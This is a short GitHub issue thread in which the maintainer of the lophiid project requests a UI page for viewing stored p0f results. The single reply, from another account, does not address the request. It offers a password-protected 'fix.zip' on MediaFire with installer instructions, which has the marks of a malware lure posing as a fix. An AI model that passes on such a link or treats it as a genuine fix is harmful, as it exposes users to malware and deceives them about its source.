### ISSUE TITLE
Add a UI page for p0f results

### ISSUE THREAD

**Issue by mrheinen** [mrheinen/lophiid#24]
It would be nice to have a page in the UI to see all p0f results. These are already stored in a table so it's just a matter of:

Copying one of the existing page combos (e.g. the new EventsList.vue and EventsForm.vue)
Adding doc= strings to the p0f_result struct in the database.go file

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
